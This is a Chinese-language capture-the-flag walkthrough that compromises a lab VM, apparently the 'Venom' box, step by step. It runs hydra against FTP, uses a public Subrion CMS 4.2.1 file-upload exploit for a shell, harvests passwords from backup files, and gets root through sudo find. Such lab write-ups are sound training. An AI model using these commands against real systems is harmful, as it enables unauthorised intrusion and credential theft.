nmap -sP 主机：10.80.56.101 靶机：10.80.56.170 #扫描一下端口详细信息，好多端口都是关闭的，这样也好，思路范围小一点 nmap -A -n 1-65535 10.80.56.170 PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp closed ssh 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-title: Apache2 Ubuntu Default Page: It works |_http-server-header: Apache/2.4.29 (Ubuntu) 443/tcp open http Apache httpd 2.4.29 |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works 7070/tcp closed realserver 8084/tcp closed websnp MAC Address: 08:00:27:10:E2:AE (Oracle VirtualBox virtual NIC) #没有什么可用的信息 nmap -sS -sV -A -n 10.80.56.170 #扫描网站目录 dirsearch -u https://10.80.56.170/ #主页注释发现疑似MD5加密，尝试在线网站解密，成功获取类似用户名的字符串 <!-- Modified from the Debian original for Ubuntu Last updated: 2016-11-16 See: https://launchpad.net/bugs/ --> <!...<5f2a66f947fa5690c26506f66bde5c23> follow this to get access on somewhere.....--> hostinger #尝试ftp，发现需要密码 ftp 10.80.56.170 #尝试爆破，爆破了很久，切换思路 hydra -l hostinger -P /usr/share/wordlists/rockyou.txt 10.80.56.170 ftp #感觉密码可能也是这个，然后尝试，成功 ftp用户：hostinger 密码：hostinger #获取提示 get hint.txt cat hint.txt Hey there... T0D0 -- #第一句话有两个编码后的字符 * You need to follow the 'hostinger' on WXpOU2FHSnRVbWhqYlZGblpHMXNibHBYTld4amJWVm5XVEpzZDJGSFZuaz0= also aHR0cHM6Ly9jcnlwdGlpLmNvbS9waXBlcy92aWdlbmVyZS1jaXBoZXI= * some knowledge of cipher is required to decode the dora password.. * try on venom.box password -- L7f9l8@J#p%Ue+Q1234 -> deocode this you will get the administrator password  #使用Cyber厨子魔法解密，https://cryptii.com/pipes/vigenere-cipher aHR0cHM6Ly9jcnlwdGlpLmNvbS9waXBlcy92aWdlbmVyZS1jaXBoZXI= #使用Cyber厨子魔法解密，standard vigenere cipher WXpOU2FHSnRVbWhqYlZGblpHMXNibHBYTld4amJWVm5XVEpzZDJGSFZuaz0= #获取信息，需要到解密的网站上使用standard vigenere cipher，并且密钥为hostinger，解密。 * You need to follow the 'hostinger' on standard vigenere cipher also https://cryptii.com/pipes/vigenere-cipher * some knowledge of cipher is required to decode the dora password.. #修改hosts添加域名解析venom.box * try on venom.box Have fun .. :) #获取信息 用户：dora 密码：E7r9t8@Q#h%Hy+M1234 #尝试进入网页，登录成功，获取管理员后台 venom.box #文件根目录 /var/www/html/subrion #扫描框架，发现可用漏洞 searchsploit Subrion CMS 4.2.1 ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Subrion CMS 4.2.1 - 'avatar[path]' XSS | php/webapps/49346.txt Subrion CMS 4.2.1 - Arbitrary File Upload | php/webapps/49876.py Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF) (Add Amin) | php/webapps/50737.txt Subrion CMS 4.2.1 - Cross-Site Scripting | php/webapps/45150.txt Subrion CMS 4.2.1 - Stored Cross-Site Scripting (XSS) #获取文件上传脚本 searchsploit -m 49876.py #上传成功，获取shell python 49876.py -u http://venom.box/panel -l dora -p E7r9t8@Q#h%Hy+M1234 #无法切换交互式shell，但是知道网站文件上传可用phar文件访问，上传反弹shell脚本，切换交互式成功 python -c "import pty;pty.spawn('/bin/bash')" #获得hostinger密码 cat .backup.txt User_access user: hostinger password: hostinger #找到一个flag cat robots.txt User-agent: * F1nd_Y0ur_way_t0_g3t1n.txt #在backups目录下找到密码，尝试已知加密算法，未能解密，可能就是明文 cat .htaccess allow from all You_will_be_happy_now :) FzN+f2-rRaBgvALzj*Rk#_JJYfg8XfKhxqB82x_a #切换用户 su hostinger #查看.bash_history文件，发现check_me.py文件很疑惑，发现经常切换nathan用户 find raj -exec "whoami" \; cat check_me.py #切换用户，使用上面的密码 su nathan #获得第2个flag cat user.txt W3_@r3_V3n0m:P #发现用户具有root执行权限 -rw-r--r-- 1 nathan nathan 0 May 20 2021 .sudo_as_admin_successful #尝试直接sudo su，失败 sudo -l [sudo] password for nathan: FzN+f2-rRaBgvALzj*Rk#_JJYfg8XfKhxqB82x_a Matching Defaults entries for nathan on venom: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User nathan may run the following commands on venom: (root) ALL, !/bin/su (root) ALL, !/bin/su sudo su #又发现check_me.py chmod +s check_me.py ls -al python check_me.py nano check_me.py python check_me.py chmod 740 check_me.py #该用户具有find权限，查询信息，以及check_me.py，未找到 find / -name 'F1nd_Y0ur_way_t0_g3t1n.txt' #查询4000权限文件，发现find find / -user root -perm -4000 -print 2>/dev/null /opt/VBoxGuestAdditions-6.1.20/bin/VBoxDRMClient /usr/bin/find #使用find提权，成功 sudo find . -exec /bin/sh \; -quit #获得最后一个flag，通关 cat root.txt #root_flag H@v3_a_n1c3_l1fe.